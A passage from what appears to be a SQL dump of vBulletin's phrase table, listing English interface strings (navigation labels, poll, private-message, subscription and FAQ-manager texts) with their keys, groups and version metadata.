'vBulletin Solutions', 1196433782, '3.7.0 Beta 1'), (35781, -1, 'open_message_in_new_window', 'global', 'Open the message in a new window?\\n\\n(Press cancel to open in the current window.)', 'vbulletin', '', 0, ''), (35782, -1, 'option', 'global', 'Option', 'vbulletin', '', 0, ''), (35783, -1, 'option_2_upload_image_from_computer', 'global', 'Option 2 - Upload Image From Your Computer', 'vbulletin', 'vBulletin Solutions', 1158602799, '3.6.2'), (35784, -1, 'optional', 'global', 'Optional', 'vbulletin', '', 0, ''), (35785, -1, 'options', 'global', 'Options', 'vbulletin', '', 0, ''), (35786, -1, 'or', 'global', 'or', 'vbulletin', '', 0, ''), (35787, -1, 'originally_posted_by_x', 'global', 'Originally Posted by {1}', 'vbulletin', '', 0, ''), (35788, -1, 'page_x', 'global', 'Page {1}', 'vbulletin', '', 0, ''), (35789, -1, 'page_x_of_y', 'global', 'Page {1} of {2}', 'vbulletin', '', 0, ''), (35790, -1, 'pagenav_first', 'global', 'First', 'vbulletin', 'vBulletin Solutions', 1247671603, '3.8.3'), (35791, -1, 'pagenav_last', 'global', 'Last', 'vbulletin', 'vBulletin Solutions', 1247671946, '3.8.3'), (35792, -1, 'pages', 'global', 'Pages', 'vbulletin', '', 0, ''), (35793, -1, 'paid_subscriptions', 'global', 'Paid Subscriptions', 'vbulletin', '', 0, ''), (35794, -1, 'password', 'global', 'Password', 'vbulletin', '', 0, ''), (35795, -1, 'per_page', 'global', 'Per Page', 'vbulletin', '', 0, ''), (35796, -1, 'perform_action', 'global', 'Perform Action', 'vbulletin', '', 0, ''), (35797, -1, 'php_code', 'global', 'PHP Code', 'vbulletin', '', 0, ''), (35798, -1, 'picture_comments_awaiting_approval', 'global', 'Picture Comments Awaiting Approval', 'vbulletin', 'vBulletin Solutions', 1200331027, '3.7.0 Beta 4'), (35799, -1, 'pictures_and_albums', 'global', 'Pictures & Albums ', 'vbulletin', 'vBulletin Solutions', 1201009871, '3.7.0 Beta 5'), (35800, -1, 'please_enter_the_text', 'global', 'Please enter the six letters or digits that appear in the image opposite. ', 'vbulletin', 'vBulletin Solutions', 1150305191, '3.6.0 Beta 3'), (35801, -1, 'please_select_one', 'global', 'Please select one', 'vbulletin', '', 0, ''), (35802, -1, 'pm_users', 'global', 'PM Users', 'vbulletin', '', 0, ''), (35803, -1, 'poll', 'global', 'Poll', 'vbulletin', '', 0, ''), (35804, -1, 'poll_options', 'global', 'Poll Options', 'vbulletin', '', 0, ''), (35805, -1, 'poll_thread_prefix', 'global', 'Poll: ', 'vbulletin', '', 0, ''), (35806, -1, 'post', 'global', 'Post', 'vbulletin', '', 0, ''), (35807, -1, 'post_icons', 'global', 'Post Icons', 'vbulletin', '', 0, ''), (35808, -1, 'post_new_user_note', 'global', 'Post New User Note', 'vbulletin', '', 0, ''), (35809, -1, 'post_time_x_at_y', 'global', 'Post Time: {1} at {2}', 'vbulletin', '', 0, ''), (35810, -1, 'post_user_note', 'global', 'Post User Note', 'vbulletin', '', 0, ''), (35811, -1, 'post_x', 'global', 'Post {1}', 'vbulletin', '', 0, ''), (35812, -1, 'posted_by', 'global', 'Posted By', 'vbulletin', '', 0, ''), (35813, -1, 'posting_rules', 'global', 'Posting Rules', 'vbulletin', '', 0, ''), (35814, -1, 'posts', 'global', 'Posts', 'vbulletin', '', 0, ''), (35815, -1, 'powered_by_vbulletin', 'global', 'Powered by vBulletin® Version {1}
Copyright ©2000 - {2}, vBulletin Solutions, Inc.', 'vbulletin', 'vBulletin Solutions', 1163500480, '3.6.4'), (35816, -1, 'prev', 'global', 'Prev', 'vbulletin', '', 0, ''), (35817, -1, 'prev_page', 'global', 'Prev Page', 'vbulletin', '', 0, ''), (35818, -1, 'prev_picture_short', 'global', 'Prev', 'vbulletin', 'vBulletin Solutions', 1265284670, '3.8.5'), (35819, -1, 'previous', 'global', 'Previous', 'vbulletin', 'vBulletin Solutions', 1219919699, '3.8.0 Alpha 1'), (35820, -1, 'previous_picture_short', 'global', 'Prev', 'vbulletin', 'vBulletin Solutions', 1247672656, '3.8.3'), (35821, -1, 'privacy_statement', 'global', 'Privacy Statement', 'vbulletin', '', 0, ''), (35822, -1, 'private', 'global', 'Private', 'vbulletin', '', 0, ''), (35823, -1, 'private_message', 'global', 'Private Message', 'vbulletin', '', 0, ''), (35824, -1, 'private_messages', 'global', 'Private Messages', 'vbulletin', '', 0, ''), (35825, -1, 'private_messages_nav', 'global', 'Private Messages: {1}, {2}.', 'vbulletin', '', 0, ''), (35826, -1, 'proceed', 'global', ' Proceed ', 'vbulletin', '', 0, ''), (35827, -1, 'profile_visitor_messages_awaiting_approval', 'global', 'Unapproved Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1212410951, '3.8.0 Alpha 1'), (35828, -1, 'public_poll_users_see_choices', 'global', 'Be advised that this is a public poll: other users can see the choice(s) you selected.', 'vbulletin', '', 0, ''), (35829, -1, 'quick_language_chooser', 'global', 'Quick Language Chooser', 'vbulletin', '', 0, ''), (35830, -1, 'quick_links', 'global', 'Quick Links', 'vbulletin', '', 0, ''), (35831, -1, 'quick_style_chooser', 'global', 'Quick Style Chooser', 'vbulletin', '', 0, ''), (35832, -1, 'quote', 'global', 'Quote', 'vbulletin', '', 0, ''), (35833, -1, 'random_question', 'global', 'Random Question', 'vbulletin', 'vBulletin Solutions', 1192574587, '3.7.0 Beta 1'), (35834, -1, 'rate_thread', 'global', 'Rate Thread', 'vbulletin', '', 0, ''), (35835, -1, 'reason', 'global', 'Reason', 'vbulletin', '', 0, ''), (35836, -1, 'redirect', 'global', 'Redirect', 'vbulletin', '', 0, ''), (35837, -1, 'redirecting', 'global', 'Redirecting...', 'vbulletin', '', 0, ''), (35838, -1, 'refresh_image', 'global', 'Refresh Image', 'vbulletin', 'vBulletin Solutions', 1159210908, '3.6.2'), (35839, -1, 'register', 'global', 'Register', 'vbulletin', '', 0, ''), (35840, -1, 'reload', 'global', 'Reload', 'vbulletin', '', 0, ''), (35841, -1, 'reload_this_page', 'global', 'Reload this Page', 'vbulletin', '', 0, ''), (35842, -1, 'remember_me', 'global', 'Remember Me?', 'vbulletin', '', 0, ''), (35843, -1, 'remove', 'global', 'Remove', 'vbulletin', '', 0, ''), (35844, -1, 'replace', 'global', 'Replace', 'vbulletin', '', 0, ''), (35845, -1, 'replies', 'global', 'Replies', 'vbulletin', '', 0, ''), (35846, -1, 'replies_x_views_y', 'global', 'Replies: {1}, Views: {2}', 'vbulletin', '', 0, ''), (35847, -1, 'reply', 'global', 'Reply', 'vbulletin', '', 0, ''), (35848, -1, 'reply_prefix', 'global', 'Re:', 'vbulletin', '', 0, ''), (35849, -1, 'reputation', 'global', 'Reputation', 'vbulletin', '', 0, ''), (35850, -1, 'reputation_disabled', 'global', 'has disabled reputation', 'vbulletin', '', 0, ''), (35851, -1, 'request_reason', 'global', 'Request Reason', 'vbulletin', '', 0, ''), (35852, -1, 'request_username_password_now', 'global', 'Request Username / Password Now', 'vbulletin', '', 0, ''), (35853, -1, 'requests_to_join_usergroup', 'global', 'Requests to Join Usergroup', 'vbulletin', '', 0, ''), (35854, -1, 'requests_to_join_your_social_groups', 'global', 'Social Groups Join Requests', 'vbulletin', 'vBulletin Solutions', 1212410978, '3.8.0 Alpha 1'), (35855, -1, 'reset', 'global', 'Reset', 'vbulletin', '', 0, ''), (35856, -1, 'reset_fields', 'global', 'Reset Fields', 'vbulletin', '', 0, ''), (35857, -1, 'results_x_to_y_of_z', 'global', 'Results {1} to {2} of {3}', 'vbulletin', '', 0, ''), (35858, -1, 'reverse_sort_order', 'global', 'Reverse Sort Order', 'vbulletin', '', 0, ''), (35859, -1, 'review_join_requests', 'global', 'Review Join Requests', 'vbulletin', '', 0, ''), (35860, -1, 'saturday', 'global', 'Saturday', 'vbulletin', '', 0, ''), (35861, -1, 'save', 'global', 'Save', 'vbulletin', '', 0, ''), (35862, -1, 'save_changes', 'global', 'Save Changes', 'vbulletin', '', 0, ''), (35863, -1, 'save_folders', 'global', 'Save Folders', 'vbulletin', '', 0, ''), (35864, -1, 'search', 'global', 'Search', 'vbulletin', '', 0, ''), (35865, -1, 'search_forums', 'global', 'Search Forums', 'vbulletin', '', 0, ''), (35866, -1, 'search_results', 'global', 'Search Results', 'vbulletin', '', 0, ''), (35867, -1, 'search_titles_only', 'global', 'Search Titles Only', 'vbulletin', 'vBulletin Solutions', 1179236984, '3.6.7'), (35868, -1, 'second', 'global', 'Second', 'vbulletin', '', 0, ''), (35869, -1, 'select_destination_folder_for_move', 'global', 'Please select a destination folder for the items that you wish to move.', 'vbulletin', '', 0, ''), (35870, -1, 'selected_threads', 'global', 'Selected Threads', 'vbulletin', '', 0, ''), (35871, -1, 'send', 'global', 'Send', 'vbulletin', '', 0, ''), (35872, -1, 'send_message_via_aim_to_x', 'global', 'Send a message via AIM to {1}', 'vbulletin', '', 0, ''), (35873, -1, 'send_message_via_email_to_x', 'global', 'Send a message via email to {1}', 'vbulletin', '', 0, ''), (35874, -1, 'send_message_via_icq_to_x', 'global', 'Send a message via ICQ to {1}', 'vbulletin', '', 0, ''), (35875, -1, 'send_message_via_msn_to_x', 'global', 'Send a message via MSN to {1}', 'vbulletin', '', 0, ''), (35876, -1, 'send_message_via_skype_to_x', 'global', 'Send a message via Skype™ to {1}', 'vbulletin', '', 0, ''), (35877, -1, 'send_message_via_yahoo_to_x', 'global', 'Send a message via Yahoo to {1}', 'vbulletin', '', 0, ''), (35878, -1, 'send_new_message', 'global', 'Send New Message', 'vbulletin', '', 0, ''), (35879, -1, 'send_private_message_to_selected_users', 'global', 'Send a private message to selected users', 'vbulletin', '', 0, ''), (35880, -1, 'send_private_message_to_x', 'global', 'Send a private message to {1}', 'vbulletin', '', 0, ''), (35881, -1, 'send_report', 'global', 'Send Report', 'vbulletin', '', 0, ''), (35882, -1, 'sent_items', 'global', 'Sent Items', 'vbulletin', '', 0, ''), (35883, -1, 'september', 'global', 'September', 'vbulletin', '', 0, ''), (35884, -1, 'show_groups', 'global', 'Show Groups', 'vbulletin', '', 0, ''), (35885, -1, 'show_message_text', 'global', 'Show Message Text', 'vbulletin', 'vBulletin Solutions', 1202913494, '3.7.0 Beta 5'), (35886, -1, 'show_posts', 'global', 'Show Posts', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35887, -1, 'show_results_x_to_y_of_z', 'global', 'Show results {1} to {2} of {3}', 'vbulletin', '', 0, ''), (35888, -1, 'show_thread_and_close_window', 'global', 'Show Thread & Close Window', 'vbulletin', '', 0, ''), (35889, -1, 'show_threads', 'global', 'Show Threads', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35890, -1, 'show_threads_from_last_day', 'global', 'Show threads from last day', 'vbulletin', '', 0, ''), (35891, -1, 'show_threads_from_last_month', 'global', 'Show threads from last month', 'vbulletin', '', 0, ''), (35892, -1, 'show_threads_from_last_week', 'global', 'Show threads from last week', 'vbulletin', '', 0, ''), (35893, -1, 'show_threads_from_last_x_days', 'global', 'Show threads from last {1} days', 'vbulletin', '', 0, ''), (35894, -1, 'show_threads_from_last_x_months', 'global', 'Show threads from last {1} months', 'vbulletin', '', 0, ''), (35895, -1, 'show_threads_from_last_x_weeks', 'global', 'Show threads from last {1} weeks', 'vbulletin', '', 0, ''), (35896, -1, 'show_threads_from_last_year', 'global', 'Show threads from last year', 'vbulletin', '', 0, ''), (35897, -1, 'show_thumbnails', 'global', 'Show Thumbnails', 'vbulletin', '', 0, ''), (35898, -1, 'showing_results_x_to_y_of_z', 'global', 'Showing results {1} to {2} of {3}', 'vbulletin', '', 0, ''), (35899, -1, 'showing_x_smilies_of_y_total', 'global', 'Showing {1} smilie(s) of {2} total.', 'vbulletin', 'vBulletin Solutions', 1205925277, '3.7.0 Release Candidate 1'), (35900, -1, 'showthread_list_next', 'global', 'Next', 'vbulletin', 'vBulletin Solutions', 1247672206, '3.8.3'), (35901, -1, 'showthread_list_prev', 'global', 'Prev', 'vbulletin', 'vBulletin Solutions', 1247672642, '3.8.3'), (35902, -1, 'signature', 'global', 'Signature', 'vbulletin', '', 0, ''), (35903, -1, 'site_areas', 'global', 'Site Areas', 'vbulletin', '', 0, ''), (35904, -1, 'smilie_list', 'global', 'Smilie List', 'vbulletin', '', 0, ''), (35905, -1, 'smilies', 'global', 'Smilies', 'vbulletin', '', 0, ''), (35906, -1, 'smilies_are_x', 'global', 'Smilies are {2}', 'vbulletin', '', 0, ''), (35907, -1, 'social_group_discussions', 'global', 'Social Group Discussions', 'vbulletin', 'vBulletin Solutions', 1213096567, '3.7.1'), (35908, -1, 'social_group_messages', 'global', 'Social Group Messages', 'vbulletin', 'vBulletin Solutions', 1195732486, '3.7.0 Beta 1'), (35909, -1, 'social_groups', 'global', 'Social Groups', 'vbulletin', 'vBulletin Solutions', 1201009893, '3.7.0 Beta 5'), (35910, -1, 'start_date', 'global', 'Start Date', 'vbulletin', '', 0, ''), (35911, -1, 'sticky_thread', 'global', 'Sticky Thread', 'vbulletin', '', 0, ''), (35912, -1, 'sticky_thread_prefix', 'global', 'Sticky: ', 'vbulletin', '', 0, ''), (35913, -1, 'subforums', 'global', 'Sub-Forums', 'vbulletin', '', 0, ''), (35914, -1, 'subject', 'global', 'Subject', 'vbulletin', '', 0, ''), (35915, -1, 'submit', 'global', 'Submit', 'vbulletin', '', 0, ''), (35916, -1, 'submit_note', 'global', 'Submit Note', 'vbulletin', '', 0, ''), (35917, -1, 'subscribe_to_discussion', 'global', 'Subscribe to Discussion', 'vbulletin', 'vBulletin Solutions', 1213712361, '3.7.1'), (35918, -1, 'subscribe_to_forum', 'global', 'Subscribe to Forum', 'vbulletin', '', 0, ''), (35919, -1, 'subscribe_to_thread', 'global', 'Subscribe to Thread', 'vbulletin', '', 0, ''), (35920, -1, 'subscribed_threads', 'global', 'Subscribed Threads', 'vbulletin', '', 0, ''), (35921, -1, 'subscribed_threads_in_folder', 'global', 'Subscribed Threads in Folder', 'vbulletin', '', 0, ''), (35922, -1, 'subscription', 'global', 'Subscription', 'vbulletin', '', 0, ''), (35923, -1, 'subscription_title', 'global', 'Subscription Title', 'vbulletin', '', 0, ''), (35924, -1, 'subscriptions', 'global', 'Subscriptions', 'vbulletin', '', 0, ''), (35925, -1, 'sum_of_attachments_owned_by_x', 'global', 'Sum of all attachments owned by {1}', 'vbulletin', '', 0, ''), (35926, -1, 'sunday', 'global', 'Sunday', 'vbulletin', '', 0, ''), (35927, -1, 'sure_you_want_to_log_out', 'global', 'Are you sure you want to log out?', 'vbulletin', '', 0, ''), (35928, -1, 'tag', 'global', 'Tag', 'vbulletin', 'vBulletin Solutions', 1190903926, '3.7.0 Beta 1'), (35929, -1, 'tag_search', 'global', 'Tag Search', 'vbulletin', 'vBulletin Solutions', 1204928786, '3.7.0 Release Candidate 1'), (35930, -1, 'tags', 'global', 'Tags', 'vbulletin', 'vBulletin Solutions', 1190903931, '3.7.0 Beta 1'), (35931, -1, 'terms_of_service', 'global', 'Terms of Service', 'vbulletin', 'vBulletin Solutions', 1218457647, '3.8.0 Alpha 1'), (35932, -1, 'text_editor_control_styles', 'global', 'Text Editor Control Styles', 'vbulletin', '', 0, ''), (35933, -1, 'there_are_no_outstanding_requests_to_join_this_usergroup', 'global', 'There are no outstanding requests to join this usergroup.', 'vbulletin', '', 0, ''), (35934, -1, 'this_poll_is_closed', 'global', 'This poll is closed', 'vbulletin', '', 0, ''), (35935, -1, 'this_poll_will_close_on_x_at_y', 'global', 'This poll will close on {1} at {2}', 'vbulletin', '', 0, ''), (35936, -1, 'this_post_will_be_automatically_moderated', 'global', 'This post will be automatically moderated', 'vbulletin', 'vBulletin Solutions', 1204718888, '3.7.0 Beta 6'), (35937, -1, 'thread', 'global', 'Thread', 'vbulletin', '', 0, ''), (35938, -1, 'thread_deleted_by_x', 'global', 'Thread deleted by {2}', 'vbulletin', 'vBulletin Solutions', 1144777155, '3.6.0 Beta 1'), (35939, -1, 'thread_rating_x_votes_y_average', 'global', 'Thread Rating: {1} votes, {2} average.', 'vbulletin', '', 0, ''), (35940, -1, 'thread_starter', 'global', 'Thread Starter', 'vbulletin', '', 0, ''), (35941, -1, 'threads', 'global', 'Threads', 'vbulletin', '', 0, ''), (35942, -1, 'thursday', 'global', 'Thursday', 'vbulletin', '', 0, ''), (35943, -1, 'time', 'global', 'Time', 'vbulletin', '', 0, ''), (35944, -1, 'timezone', 'global', 'Timezone', 'vbulletin', '', 0, ''), (35945, -1, 'title', 'global', 'Title', 'vbulletin', '', 0, ''), (35946, -1, 'to', 'global', 'To', 'vbulletin', 'vBulletin Solutions', 1221838962, '3.8.0 Alpha 2'), (35947, -1, 'to_add_a_new_folder', 'global', 'To add a new folder, enter the name of the new folder in one of the empty boxes in the list.', 'vbulletin', '', 0, ''), (35948, -1, 'to_delete_user_note_check_box', 'global', 'To delete this user note, check the box below and then click the \'Delete this Note\' button.', 'vbulletin', '', 0, ''), (35949, -1, 'to_rename_a_folder', 'global', 'To rename a folder, edit the folder\'s name in the list.', 'vbulletin', '', 0, ''), (35950, -1, 'today', 'global', 'Today', 'vbulletin', '', 0, ''), (35951, -1, 'todays_birthdays', 'global', 'Today\'s Birthdays', 'vbulletin', '', 0, ''), (35952, -1, 'todays_events', 'global', 'Today\'s Events', 'vbulletin', '', 0, ''), (35953, -1, 'todays_posts', 'global', 'Today\'s Posts', 'vbulletin', '', 0, ''), (35954, -1, 'top', 'global', 'Top', 'vbulletin', '', 0, ''), (35955, -1, 'total', 'global', 'Total', 'vbulletin', '', 0, ''), (35956, -1, 'total_posts_x', 'global', 'Total Posts: {1}', 'vbulletin', '', 0, ''), (35957, -1, 'total_x_nav', 'global', 'Total {1}', 'vbulletin', '', 0, ''), (35958, -1, 'track_messages', 'global', 'Track Messages', 'vbulletin', '', 0, ''), (35959, -1, 'tuesday', 'global', 'Tuesday', 'vbulletin', '', 0, ''), (35960, -1, 'unread_date', 'global', 'Unread', 'vbulletin', '', 0, ''), (35961, -1, 'unread_picture_comments', 'global', 'Unread Picture Comments', 'vbulletin', 'vBulletin Solutions', 1200330978, '3.7.0 Beta 4'), (35962, -1, 'unread_private_messages', 'global', 'Unread Private Messages', 'vbulletin', 'vBulletin Solutions', 1197374491, '3.7.0 Beta 1'), (35963, -1, 'unread_profile_visitor_messages', 'global', 'Unread Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1212410959, '3.8.0 Alpha 1'), (35964, -1, 'unread_x_nav', 'global', 'Unread {1}', 'vbulletin', '', 0, ''), (35965, -1, 'unregistered', 'global', 'Unregistered', 'vbulletin', '', 0, ''), (35966, -1, 'unsubscribe', 'global', 'Unsubscribe', 'vbulletin', '', 0, ''), (35967, -1, 'unsubscribe_from_this_forum', 'global', 'Unsubscribe from this Forum', 'vbulletin', '', 0, ''), (35968, -1, 'upcoming_events_for_the_next_x_days', 'global', 'Upcoming Events for the Next {1} Day(s)', 'vbulletin', '', 0, ''), (35969, -1, 'update_subscription_type', 'global', 'Update Subscription Type', 'vbulletin', '', 0, ''), (35970, -1, 'updating_post_counts', 'global', 'Updating Post Counts', 'vbulletin', '', 0, ''), (35971, -1, 'upload', 'global', 'Upload', 'vbulletin', '', 0, ''), (35972, -1, 'upload_errors', 'global', 'Upload Errors', 'vbulletin', '', 0, ''), (35973, -1, 'user', 'global', 'User', 'vbulletin', '', 0, ''), (35974, -1, 'user_control_panel', 'global', 'User Control Panel', 'vbulletin', '', 0, ''), (35975, -1, 'user_cp', 'global', 'User CP', 'vbulletin', '', 0, ''), (35976, -1, 'user_name', 'global', 'User Name', 'vbulletin', '', 0, ''), (35977, -1, 'user_notes_for_x', 'global', 'User Notes for {1}', 'vbulletin', '', 0, ''), (35978, -1, 'usergroup', 'global', 'Usergroup', 'vbulletin', '', 0, ''), (35979, -1, 'usergroups', 'global', 'Usergroups', 'vbulletin', '', 0, ''), (35980, -1, 'userid', 'global', 'Userid', 'vbulletin', '', 0, ''), (35981, -1, 'username', 'global', 'User Name', 'vbulletin', '', 0, ''), (35982, -1, 'valid_file_extensions', 'global', 'Valid file extensions', 'vbulletin', '', 0, ''), (35983, -1, 'vbulletin_copyright', 'global', 'vBulletin® v{1}, Copyright ©2000-{2}, vBulletin Solutions, Inc.', 'vbulletin', 'vBulletin Solutions', 1162556078, '3.6.3'), (35984, -1, 'vbulletin_message', 'global', 'vBulletin Message', 'vbulletin', 'vBulletin Solutions', 1163500549, '3.6.4'), (35985, -1, 'view', 'global', 'View', 'vbulletin', '', 0, ''), (35986, -1, 'view_all_announcements', 'global', 'View All Announcements', 'vbulletin', '', 0, ''), (35987, -1, 'view_all_subscribed_threads', 'global', 'View all Subscribed Threads', 'vbulletin', '', 0, ''), (35988, -1, 'view_announcement', 'global', 'View Announcement', 'vbulletin', 'vBulletin Solutions', 1159293350, '3.6.2'), (35989, -1, 'view_birthdays', 'global', 'View Birthdays', 'vbulletin', '', 0, ''), (35990, -1, 'view_forum_leaders', 'global', 'View Forum Leaders', 'vbulletin', '', 0, ''), (35991, -1, 'view_poll_results', 'global', 'View Poll Results', 'vbulletin', '', 0, ''), (35992, -1, 'view_post', 'global', 'View Post', 'vbulletin', '', 0, ''), (35993, -1, 'view_profile', 'global', 'View Profile', 'vbulletin', '', 0, ''), (35994, -1, 'view_whos_online', 'global', 'View Who\'s Online', 'vbulletin', '', 0, ''), (35995, -1, 'views', 'global', 'Views', 'vbulletin', '', 0, ''), (35996, -1, 'visitor_messages', 'global', 'Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1197370702, '3.7.0 Beta 1'), (35997, -1, 'vote_now', 'global', 'Vote Now', 'vbulletin', '', 0, ''), (35998, -1, 'voters', 'global', 'Voters', 'vbulletin', '', 0, ''), (35999, -1, 'votes', 'global', 'Votes', 'vbulletin', '', 0, ''), (36000, -1, 'wednesday', 'global', 'Wednesday', 'vbulletin', '', 0, ''), (36001, -1, 'week', 'global', 'Week', 'vbulletin', '', 0, ''), (36002, -1, 'weekly_email_notification', 'global', 'Weekly email notification', 'vbulletin', '', 0, ''), (36003, -1, 'weekly_updates_by_email', 'global', 'Weekly updates by email', 'vbulletin', '', 0, ''), (36004, -1, 'weeks', 'global', 'Weeks', 'vbulletin', '', 0, ''), (36005, -1, 'welcome_to_our_newest_member_x', 'global', 'Welcome to our newest member, {2}', 'vbulletin', 'vBulletin Solutions', 1200570600, '3.7.0 Beta 4'), (36006, -1, 'welcome_to_the_x', 'global', 'Welcome to the {1}.', 'vbulletin', '', 0, ''), (36007, -1, 'welcome_x', 'global', 'Welcome, {1}.', 'vbulletin', '', 0, ''), (36008, -1, 'welcome_x_link_y', 'global', 'Welcome, {1}.', 'vbulletin', 'vBulletin Solutions', 1195218156, '3.7.0 Beta 1'), (36009, -1, 'whats_going_on', 'global', 'What\'s Going On?', 'vbulletin', '', 0, ''), (36010, -1, 'who_posted', 'global', 'Who Posted?', 'vbulletin', '', 0, ''), (36011, -1, 'whos_online', 'global', 'Who\'s Online', 'vbulletin', '', 0, ''), (36012, -1, 'window_open_failed_blocker', 'global', 'Unable to open a new browser window,\\n This might be due to a \'popup blocker\'', 'vbulletin', '', 0, ''), (36013, -1, 'within_the_last_x_days', 'global', 'Within the Last {1} Days', 'vbulletin', '', 0, ''), (36014, -1, 'x_attachments', 'global', '{1} Attachment(s)', 'vbulletin', '', 0, ''), (36015, -1, 'x_days_ago', 'global', '{1} Days Ago', 'vbulletin', '', 0, ''), (36016, -1, 'x_does_not_have_any_notes', 'global', '{1} does not currently have any notes.', 'vbulletin', '', 0, ''), (36017, -1, 'x_downloads', 'global', '{1} Downloads', 'vbulletin', '', 0, ''), (36018, -1, 'x_hours_ago', 'global', '{1} Hours Ago', 'vbulletin', '', 0, ''), (36019, -1, 'x_is_invisible', 'global', '{1} is invisible', 'vbulletin', '', 0, ''), (36020, -1, 'x_is_offline', 'global', '{1} is offline', 'vbulletin', '', 0, ''), (36021, -1, 'x_is_on_your_ignore_list', 'global', '{1} is on your ignore list.', 'vbulletin', '', 0, ''), (36022, -1, 'x_is_online_now', 'global', '{1} is online now', 'vbulletin', '', 0, ''), (36023, -1, 'x_is_y', 'global', '{1} is {2}', 'vbulletin', '', 0, ''), (36024, -1, 'x_mailer', 'global', '{1}', 'vbulletin', '', 0, ''), (36025, -1, 'x_members_and_y_guests', 'global', '{1} members and {2} guests', 'vbulletin', '', 0, ''), (36026, -1, 'x_minutes_ago', 'global', '{1} Minutes Ago', 'vbulletin', '', 0, ''), (36027, -1, 'x_of_y', 'global', '{1} of {2}', 'vbulletin', 'vBulletin Solutions', 1219941481, '3.8.0 Alpha 1'), (36028, -1, 'x_powered_by_vbulletin', 'global', '{1} - Powered by vBulletin', 'vbulletin', 'vBulletin Solutions', 1163500505, '3.6.4'), (36029, -1, 'x_statistics', 'global', '{1} Statistics', 'vbulletin', '', 0, ''), (36030, -1, 'x_viewing', 'global', '{1} Viewing', 'vbulletin', '', 0, ''), (36031, -1, 'x_weeks_ago', 'global', '{1} Weeks Ago', 'vbulletin', '', 0, ''), (36032, -1, 'x_y_requests', 'global', '{1} ({2} requests)', 'vbulletin', '', 0, ''), (36033, -1, 'year', 'global', 'Year', 'vbulletin', '', 0, ''), (36034, -1, 'years', 'global', 'Years', 'vbulletin', '', 0, ''), (36035, -1, 'yes', 'global', 'Yes', 'vbulletin', '', 0, ''), (36036, -1, 'yesterday', 'global', 'Yesterday', 'vbulletin', '', 0, ''), (36037, -1, 'you_are_subscribed_to_this_thread', 'global', 'You are subscribed to this thread', 'vbulletin', '', 0, ''), (36038, -1, 'you_have_already_voted_on_this_poll', 'global', 'You have already voted on this poll', 'vbulletin', '', 0, ''), (36039, -1, 'you_have_been_invited_to_the_following_groups', 'global', 'You have been invited to the following groups', 'vbulletin', 'vBulletin Solutions', 1196871221, '3.7.0 Beta 1'), (36040, -1, 'you_may_edit_your_posts', 'global', 'You may edit your posts', 'vbulletin', 'vBulletin Solutions', 1196184568, '3.7.0 Beta 1'), (36041, -1, 'you_may_not_edit_your_posts', 'global', 'You may not edit your posts', 'vbulletin', 'vBulletin Solutions', 1196184562, '3.7.0 Beta 1'), (36042, -1, 'you_may_not_post_attachments', 'global', 'You may not post attachments', 'vbulletin', 'vBulletin Solutions', 1196184525, '3.7.0 Beta 1'), (36043, -1, 'you_may_not_post_new_threads', 'global', 'You may not post new threads', 'vbulletin', 'vBulletin Solutions', 1196184466, '3.7.0 Beta 1'), (36044, -1, 'you_may_not_post_replies', 'global', 'You may not post replies', 'vbulletin', 'vBulletin Solutions', 1196184500, '3.7.0 Beta 1'), (36045, -1, 'you_may_not_vote_on_this_poll', 'global', 'You may not vote on this poll', 'vbulletin', '', 0, ''), (36046, -1, 'you_may_only_attach_x_files_per_post', 'global', 'You may only attach up to {1} files per post', 'vbulletin', '', 0, ''), (36047, -1, 'you_may_post_attachments', 'global', 'You may post attachments', 'vbulletin', 'vBulletin Solutions', 1196184530, '3.7.0 Beta 1'), (36048, -1, 'you_may_post_new_threads', 'global', 'You may post new threads', 'vbulletin', 'vBulletin Solutions', 1196184471, '3.7.0 Beta 1'), (36049, -1, 'you_may_post_replies', 'global', 'You may post replies', 'vbulletin', 'vBulletin Solutions', 1196184504, '3.7.0 Beta 1'), (36050, -1, 'your_folders', 'global', 'Your Folders', 'vbulletin', '', 0, ''), (36051, -1, 'your_notifications', 'global', 'Your Notifications', 'vbulletin', 'vBulletin Solutions', 1197383039, '3.7.0 Beta 1'), (36052, -1, 'your_pm_box_is_x_full', 'global', 'Your PM box is {1}% full.', 'vbulletin', 'vBulletin Solutions', 1146506218, '3.6.0 Beta 1'), (36053, -1, 'your_profile', 'global', 'Your Profile', 'vbulletin', 'vBulletin Solutions', 1197893928, '3.7.0 Beta 2'), (36054, -1, 'your_username', 'global', 'Your Username', 'vbulletin', '', 0, ''), (36055, -1, 'action_leave_blank', 'help_faq', 'Action:- leave blank to make a general topic
- use commas to separate multiple actions
', 'vbulletin', 'vBulletin Solutions', 1163415108, '3.6.4'), (36056, -1, 'action_specific_topics', 'help_faq', 'Action Specific Topics', 'vbulletin', '', 0, ''), (36057, -1, 'add_child_faq_item', 'help_faq', 'Add Child FAQ Item', 'vbulletin', '', 0, ''), (36058, -1, 'add_new_faq_item', 'help_faq', 'Add New FAQ Item', 'vbulletin', '', 0, ''), (36059, -1, 'add_new_topic', 'help_faq', 'Add New Topic', 'vbulletin', '', 0, ''), (36060, -1, 'admin_help', 'help_faq', 'Admin Help', 'vbulletin', '', 0, ''), (36061, -1, 'admin_help_manager', 'help_faq', 'Admin Help Manager', 'vbulletin', '', 0, ''), (36062, -1, 'all_scripts', 'help_faq', 'All Scripts', 'vbulletin', '', 0, ''), (36063, -1, 'are_you_sure_want_to_delete_faq_item_x', 'help_faq', 'Are you sure you want to delete the FAQ item called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (36064, -1, 'are_you_sure_want_to_delete_topic_x', 'help_faq', 'Are you sure you want to delete the topic called \'{1}\'?
({2}: {3})

